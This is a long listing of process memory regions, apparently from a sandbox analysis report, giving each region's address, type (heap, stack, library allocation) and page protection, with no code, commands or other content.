unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
23FE3E67000
|
heap
|
page read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
23FE3C86000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
223C000
|
unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
7FFB4A360000
|
trusted library allocation
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
1AA000
|
stack
|
page read and write
|
||
|
BCFE03E000
|
stack
|
page read and write
|
||
|
23FE3C89000
|
heap
|
page read and write
|
||
|
970000
|
unkown
|
page read and write
|
||
|
24A03302000
|
heap
|
page read and write
|
||
|
7FFB4A20C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
23FE44B4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08D80000
|
trusted library allocation
|
page read and write
|
||
|
8B0000
|
unkown
|
page readonly
|
||
|
608E000
|
stack
|
page read and write
|
||
|
86C000
|
stack
|
page read and write
|
||
|
21E625A0000
|
trusted library allocation
|
page read and write
|
||
|
237E135D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE43F3000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
783F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE4401000
|
heap
|
page read and write
|
||
|
34DC000
|
unclassified section
|
page read and write
|
||
|
24A03130000
|
heap
|
page read and write
|
||
|
24A086F0000
|
trusted library allocation
|
page read and write
|
||
|
4878000
|
unclassified section
|
page read and write
|
||
|
24A03292000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
21E62624000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE86E0000
|
heap
|
page read and write
|
||
|
2D06000
|
heap
|
page read and write
|
||
|
24A0323F000
|
heap
|
page read and write
|
||
|
23FE455A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E63DD1000
|
heap
|
page read and write
|
||
|
7FFB4A420000
|
trusted library allocation
|
page read and write
|
||
|
237E137D000
|
heap
|
page read and write
|
||
|
1013000
|
heap
|
page read and write
|
||
|
2417EC01000
|
heap
|
page read and write
|
||
|
23FE430F000
|
heap
|
page read and write
|
||
|
961000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08A00000
|
trusted library allocation
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
23FE3C2E000
|
heap
|
page read and write
|
||
|
23FE000
|
system
|
page execute and read and write
|
||
|
23FE44C3000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2518000
|
stack
|
page read and write
|
||
|
24A03300000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
23FE4308000
|
heap
|
page read and write
|
||
|
7882000
|
heap
|
page read and write
|
||
|
237E135D000
|
heap
|
page read and write
|
||
|
A2BB1FB000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A03313000
|
heap
|
page read and write
|
||
|
24A03150000
|
heap
|
page read and write
|
||
|
A2BA4F6000
|
stack
|
page read and write
|
||
|
2417F321000
|
trusted library allocation
|
page read and write
|
||
|
23FE4449000
|
heap
|
page read and write
|
||
|
1AA000
|
stack
|
page read and write
|
||
|
2417F4AA000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C1F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
21E7C6DE000
|
heap
|
page read and write
|
||
|
317D000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4A470000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4529000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E135A000
|
heap
|
page read and write
|
||
|
23FE3DDE000
|
heap
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
23FE86C5000
|
trusted library allocation
|
page read and write
|
||
|
240A000
|
system
|
page execute and read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
1019000
|
heap
|
page read and write
|
||
|
237E1240000
|
trusted library allocation
|
page read and write
|
||
|
86C000
|
stack
|
page read and write
|
||
|
7FFB4A153000
|
trusted library allocation
|
page execute and read and write
|
||
|
3642000
|
unkown
|
page read and write
|
||
|
2B44000
|
unkown
|
page read and write
|
||
|
23FE3C91000
|
heap
|
page read and write
|
||
|
23FE4518000
|
heap
|
page read and write
|
||
|
23FE4342000
|
heap
|
page read and write
|
||
|
24A0327E000
|
heap
|
page read and write
|
||
|
100A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E62350000
|
heap
|
page read and write
|
||
|
24A03B13000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
600000
|
unkown
|
page read and write
|
||
|
23FE4404000
|
heap
|
page read and write
|
||
|
23FE3DC8000
|
heap
|
page read and write
|
||
|
22B0000
|
unkown
|
page readonly
|
||
|
21E7C6A6000
|
heap
|
page read and write
|
||
|
2417EC01000
|
heap
|
page read and write
|
||
|
21E645A4000
|
trusted library allocation
|
page read and write
|
||
|
237E1384000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
24A08900000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
2924000
|
heap
|
page read and write
|
||
|
237E1264000
|
heap
|
page read and write
|
||
|
24A08710000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
trusted library allocation
|
page read and write
|
||
|
2417F4C4000
|
trusted library allocation
|
page read and write
|
||
|
23FE44E1000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
237E1399000
|
heap
|
page read and write
|
||
|
2937000
|
heap
|
page read and write
|
||
|
21E64598000
|
trusted library allocation
|
page read and write
|
||
|
4C8C000
|
unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4312000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
19AF000
|
stack
|
page read and write
|
||
|
23FE43EA000
|
heap
|
page read and write
|
||
|
23FE2F3E000
|
heap
|
page read and write
|
||
|
23FE44D0000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
4554000
|
unclassified section
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
7FFB4A370000
|
trusted library allocation
|
page read and write
|
||
|
21E65474000
|
trusted library allocation
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
23FE3D70000
|
heap
|
page read and write
|
||
|
21E645A6000
|
trusted library allocation
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
24A08CF0000
|
trusted library allocation
|
page read and write
|
||
|
23E5000
|
system
|
page execute and read and write
|
||
|
23FE4326000
|
heap
|
page read and write
|
||
|
237E1350000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E7C450000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7849000
|
heap
|
page read and write
|
||
|
23FE3E6E000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
BCFDB7E000
|
stack
|
page read and write
|
||
|
CF1000
|
unkown
|
page readonly
|
||
|
21E65BDA000
|
trusted library allocation
|
page read and write
|
||
|
69EF3FB000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E7C627000
|
heap
|
page execute and read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
BCFDCFE000
|
stack
|
page read and write
|
||
|
295D000
|
heap
|
page read and write
|
||
|
23FE3E6E000
|
heap
|
page read and write
|
||
|
237E11B0000
|
heap
|
page read and write
|
||
|
24A087E0000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C26000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
78AE000
|
heap
|
page read and write
|
||
|
64C000
|
heap
|
page read and write
|
||
|
23FE3C32000
|
heap
|
page read and write
|
||
|
237E2BD4000
|
heap
|
page read and write
|
||
|
23FE3C2A000
|
heap
|
page read and write
|
||
|
500000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
14C0000
|
direct allocation
|
page read and write
|
||
|
23FE2F24000
|
heap
|
page read and write
|
||
|
237E1266000
|
heap
|
page read and write
|
||
|
237E126E000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE44BB000
|
heap
|
page read and write
|
||
|
23FE3DD1000
|
heap
|
page read and write
|
||
|
24A08870000
|
trusted library allocation
|
page read and write
|
||
|
783F000
|
heap
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
21E64111000
|
trusted library allocation
|
page read and write
|
||
|
69EFBFD000
|
stack
|
page read and write
|
||
|
21E656CF000
|
trusted library allocation
|
page read and write
|
||
|
23FE4404000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
21E63F30000
|
heap
|
page read and write
|
||
|
7FFB4A30A000
|
trusted library allocation
|
page read and write
|
||
|
3F0C000
|
unclassified section
|
page read and write
|
||
|
23FE3E03000
|
heap
|
page read and write
|
||
|
2417F200000
|
trusted library allocation
|
page read and write
|
||
|
FB87FFE000
|
unkown
|
page readonly
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
24A088F7000
|
heap
|
page read and write
|
||
|
23FE42ED000
|
heap
|
page read and write
|
||
|
7866000
|
heap
|
page read and write
|
||
|
237E12A0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3E6E000
|
heap
|
page read and write
|
||
|
24A0327A000
|
heap
|
page read and write
|
||
|
7FFB4A3B0000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E63F20000
|
heap
|
page read and write
|
||
|
23FE44A5000
|
heap
|
page read and write
|
||
|
78E9000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C64000
|
heap
|
page read and write
|
||
|
24A03275000
|
heap
|
page read and write
|
||
|
24A08781000
|
trusted library allocation
|
page read and write
|
||
|
23FE4526000
|
heap
|
page read and write
|
||
|
24A08A00000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
29F0000
|
unkown
|
page execute and read and write
|
||
|
2B16000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
237E12DD000
|
heap
|
page read and write
|
||
|
23FE3C19000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE440D000
|
heap
|
page read and write
|
||
|
21E74111000
|
trusted library allocation
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
78B3000
|
heap
|
page read and write
|
||
|
24A088C2000
|
heap
|
page read and write
|
||
|
4B87000
|
unkown
|
page execute and read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
101A000
|
heap
|
page read and write
|
||
|
237E137E000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
23EE000
|
system
|
page execute and read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
2417EBD0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2417EBFF000
|
heap
|
page read and write
|
||
|
46E6000
|
unclassified section
|
page read and write
|
||
|
1F0000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1350000
|
heap
|
page read and write
|
||
|
BCFDDF8000
|
stack
|
page read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
24A032BB000
|
heap
|
page read and write
|
||
|
23FE44F9000
|
heap
|
page read and write
|
||
|
1013000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2FDD000
|
direct allocation
|
page execute and read and write
|
||
|
1A00000
|
unclassified section
|
page execute and read and write
|
||
|
9F0000
|
unkown
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
23FE4383000
|
heap
|
page read and write
|
||
|
21E64017000
|
heap
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2417F30F000
|
trusted library allocation
|
page read and write
|
||
|
24A03302000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
2956000
|
heap
|
page read and write
|
||
|
237E138C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08750000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
BCFDE3E000
|
stack
|
page read and write
|
||
|
23FE4326000
|
heap
|
page read and write
|
||
|
2E00000
|
unclassified section
|
page execute and read and write
|
||
|
1831000
|
direct allocation
|
page execute and read and write
|
||
|
2417F160000
|
heap
|
page read and write
|
||
|
2897000
|
heap
|
page read and write
|
||
|
8B0000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E6456C000
|
trusted library allocation
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2474000
|
heap
|
page read and write
|
||
|
21E64566000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
FB874F7000
|
stack
|
page read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
2482000
|
unkown
|
page read and write
|
||
|
275C000
|
unkown
|
page read and write
|
||
|
21E63F7A000
|
heap
|
page read and write
|
||
|
FB88AFE000
|
unkown
|
page readonly
|
||
|
24A0881F000
|
heap
|
page read and write
|
||
|
3202000
|
unclassified section
|
page read and write
|
||
|
A2BA7FC000
|
stack
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
23FE3C8B000
|
heap
|
page read and write
|
||
|
23FE3C7F000
|
heap
|
page read and write
|
||
|
1030000
|
unkown
|
page readonly
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
19F0000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
786B000
|
heap
|
page read and write
|
||
|
7FFB4A3E0000
|
trusted library allocation
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
23FE44FB000
|
heap
|
page read and write
|
||
|
21E645AC000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1383000
|
heap
|
page read and write
|
||
|
3EA02000
|
system
|
page read and write
|
||
|
23FE44AD000
|
heap
|
page read and write
|
||
|
2400000
|
unclassified section
|
page execute and read and write
|
||
|
11F1000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
78D6000
|
heap
|
page read and write
|
||
|
2417EBB0000
|
heap
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2417EA70000
|
system
|
page execute and read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
FB877FE000
|
unkown
|
page readonly
|
||
|
FB889F9000
|
stack
|
page read and write
|
||
|
500000
|
unkown
|
page readonly
|
||
|
3AF8000
|
unkown
|
page read and write
|
||
|
7FFB4A270000
|
trusted library allocation
|
page execute and read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
23FE43BC000
|
heap
|
page read and write
|
||
|
289D000
|
heap
|
page read and write
|
||
|
24A08779000
|
trusted library allocation
|
page read and write
|
||
|
BCFEC8D000
|
stack
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
237E1315000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
140000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7FFB4A210000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A03D00000
|
trusted library allocation
|
page read and write
|
||
|
BCFDFB9000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E62530000
|
trusted library allocation
|
page read and write
|
||
|
21E7C718000
|
heap
|
page read and write
|
||
|
23FE3C1B000
|
heap
|
page read and write
|
||
|
7878000
|
heap
|
page read and write
|
||
|
237E138C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
628000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
2542000
|
unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
A2BA8FB000
|
stack
|
page read and write
|
||
|
23FE3C64000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
8F0000
|
unkown
|
page read and write
|
||
|
23FE3C84000
|
heap
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
100E000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
6F0000
|
unkown
|
page readonly
|
||
|
23FE3DD8000
|
heap
|
page read and write
|
||
|
23FE436A000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE438E000
|
heap
|
page read and write
|
||
|
237E11D0000
|
heap
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
6E0000
|
unkown
|
page readonly
|
||
|
2417F400000
|
trusted library allocation
|
page read and write
|
||
|
23FE3DFB000
|
heap
|
page read and write
|
||
|
23FE3C99000
|
heap
|
page read and write
|
||
|
24A08711000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4313000
|
heap
|
page read and write
|
||
|
24A088FC000
|
heap
|
page read and write
|
||
|
23FE44D8000
|
heap
|
page read and write
|
||
|
23FE3DCD000
|
heap
|
page read and write
|
||
|
237E10D0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A200000
|
trusted library allocation
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
A2BA5FE000
|
stack
|
page read and write
|
||
|
237E1382000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
21E640C0000
|
heap
|
page execute and read and write
|
||
|
2945000
|
heap
|
page read and write
|
||
|
2EB0000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4A301000
|
trusted library allocation
|
page read and write
|
||
|
237E2BDD000
|
heap
|
page read and write
|
||
|
23FE4564000
|
heap
|
page read and write
|
||
|
23FE43FF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E624E3000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1390000
|
heap
|
page read and write
|
||
|
FB8927E000
|
stack
|
page read and write
|
||
|
23FE3C7F000
|
heap
|
page read and write
|
||
|
21E64100000
|
heap
|
page execute and read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
23FE3C97000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C7F000
|
heap
|
page read and write
|
||
|
3D7A000
|
unclassified section
|
page read and write
|
||
|
7892000
|
heap
|
page read and write
|
||
|
21E62620000
|
heap
|
page read and write
|
||
|
8E0000
|
unkown
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
237E137D000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
7FFB4A17D000
|
trusted library allocation
|
page execute and read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
237E1399000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
BCFDBFD000
|
stack
|
page read and write
|
||
|
2482000
|
unkown
|
page read and write
|
||
|
237E137D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7FFB4A3D0000
|
trusted library allocation
|
page read and write
|
||
|
182D000
|
direct allocation
|
page execute and read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE436F000
|
heap
|
page read and write
|
||
|
37D4000
|
unkown
|
page read and write
|
||
|
28E1000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
78CC000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE43AF000
|
heap
|
page read and write
|
||
|
2888000
|
heap
|
page read and write
|
||
|
3EAC2000
|
system
|
page read and write
|
||
|
FB875FE000
|
unkown
|
page readonly
|
||
|
2417F4CE000
|
trusted library allocation
|
page read and write
|
||
|
24A046A0000
|
trusted library allocation
|
page read and write
|
||
|
21E62370000
|
heap
|
page read and write
|
||
|
28F4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DC6000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
BCFDC7E000
|
stack
|
page read and write
|
||
|
290C000
|
heap
|
page read and write
|
||
|
21E62439000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
2474000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1260000
|
heap
|
page read and write
|
||
|
24A0890A000
|
heap
|
page read and write
|
||
|
24A08710000
|
trusted library allocation
|
page read and write
|
||
|
21E74B2A000
|
trusted library allocation
|
page read and write
|
||
|
23FE44D8000
|
heap
|
page read and write
|
||
|
21E65CE1000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
130000
|
unkown
|
page readonly
|
||
|
23FE4527000
|
heap
|
page read and write
|
||
|
21E64198000
|
trusted library allocation
|
page read and write
|
||
|
24A03306000
|
heap
|
page read and write
|
||
|
23FE44D7000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E62560000
|
trusted library allocation
|
page read and write
|
||
|
23FE4526000
|
heap
|
page read and write
|
||
|
2470000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE42FE000
|
heap
|
page read and write
|
||
|
23FE4304000
|
heap
|
page read and write
|
||
|
2897000
|
heap
|
page read and write
|
||
|
24A08A50000
|
trusted library allocation
|
page read and write
|
||
|
2417EBA0000
|
heap
|
page read and write
|
||
|
22B0000
|
unkown
|
page readonly
|
||
|
7FFB4A310000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE3E65000
|
heap
|
page read and write
|
||
|
24A08846000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
24A08800000
|
heap
|
page read and write
|
||
|
1201000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1388000
|
heap
|
page read and write
|
||
|
78A8000
|
heap
|
page read and write
|
||
|
21E63F9B000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
860000
|
unkown
|
page read and write
|
||
|
23FE4393000
|
heap
|
page read and write
|
||
|
21E645A2000
|
trusted library allocation
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE3300000
|
heap
|
page read and write
|
||
|
21E63FE6000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
21E63F48000
|
heap
|
page read and write
|
||
|
76A000
|
stack
|
page read and write
|
||
|
237E1315000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
3ECDC000
|
system
|
page read and write
|
||
|
275C000
|
unkown
|
page read and write
|
||
|
237E1280000
|
heap
|
page read and write
|
||
|
611000
|
unkown
|
page readonly
|
||
|
78DC000
|
heap
|
page read and write
|
||
|
24A03B1A000
|
heap
|
page read and write
|
||
|
1480000
|
direct allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
23FE8890000
|
heap
|
page read and write
|
||
|
7B30000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
3181000
|
direct allocation
|
page execute and read and write
|
||
|
78EC000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
A2BACFE000
|
stack
|
page read and write
|
||
|
24A08A60000
|
trusted library allocation
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
21E62430000
|
heap
|
page read and write
|
||
|
21E6246E000
|
heap
|
page read and write
|
||
|
785B000
|
heap
|
page read and write
|
||
|
4FC000
|
stack
|
page read and write
|
||
|
78DF000
|
heap
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E135D000
|
heap
|
page read and write
|
||
|
23FE4383000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
23FE3DFE000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
133E000
|
stack
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
21E7C6D0000
|
heap
|
page read and write
|
||
|
21E7C6CA000
|
heap
|
page read and write
|
||
|
24A08863000
|
heap
|
page read and write
|
||
|
24A08700000
|
trusted library allocation
|
page read and write
|
||
|
23FE4576000
|
heap
|
page read and write
|
||
|
237E1355000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE2F39000
|
heap
|
page read and write
|
||
|
4A0A000
|
unclassified section
|
page read and write
|
||
|
23FE44CB000
|
heap
|
page read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
7FFB4A390000
|
trusted library allocation
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
289D000
|
heap
|
page read and write
|
||
|
23FE4305000
|
heap
|
page read and write
|
||
|
21E64BDC000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
120000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DDB000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A03B5A000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
7FFB4A440000
|
trusted library allocation
|
page read and write
|
||
|
21E6401C000
|
heap
|
page read and write
|
||
|
4FC000
|
stack
|
page read and write
|
||
|
7872000
|
heap
|
page read and write
|
||
|
7FFB4A340000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE4402000
|
heap
|
page read and write
|
||
|
23FE4305000
|
heap
|
page read and write
|
||
|
13C1000
|
unkown
|
page readonly
|
||
|
23FE44F7000
|
heap
|
page read and write
|
||
|
237E1384000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C43000
|
heap
|
page read and write
|
||
|
23FE4516000
|
heap
|
page read and write
|
||
|
23FE3C7B000
|
heap
|
page read and write
|
||
|
38C4000
|
unclassified section
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
21E65DAA000
|
trusted library allocation
|
page read and write
|
||
|
6E0000
|
unkown
|
page readonly
|
||
|
